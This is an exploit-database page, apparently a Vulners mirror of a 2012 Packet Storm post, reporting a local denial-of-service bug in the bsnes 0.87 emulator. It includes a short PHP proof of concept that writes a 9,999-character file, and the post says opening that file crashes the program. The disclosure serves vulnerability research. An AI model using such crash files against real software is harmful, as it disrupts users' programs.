Lucene search
K

bsnes 0.87 Denial Of Service

🗓️ 24 May 2012 00:00:00Reported by Pr0T3cT10nType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

bsnes 0.87 Denial of Service vulnerability in Windows 7 64Bi

Code
`<?php  
# bsnes v0.87 Local Daniel Of Service  
# Tested on Windows 7 64Bit  
# Software Site: http://byuu.org/bsnes/  
# Software Download: http://www.emulator-zone.com/download.php/emulators/snes/bsnes/bsnes_v087-64bit.7z  
# Author: Pr0T3cT10n  
##################################################################  
# bsnes v0.87 is vulnerable to local denial of service attack.  
# When we try to open a file by 'Catridge' -> 'Load NES Catridge'  
# that contains 9999 chars ('A'), so bsnes should crash.  
##################################################################  
# PoC / Code:  
$buffer = str_repeat('A', 9999); # Create 9999 chars('A')..  
if(file_put_contents('crash.nes', $buffer)) {  
echo("File created successfuly.\r\bsnes should crash when you open the file with it.\r\n");  
} else {  
echo("Can't create file. Please try again.\r\n");  
}  
# Cya :)  
# 0x31337.net  
####################  
?>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 May 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
18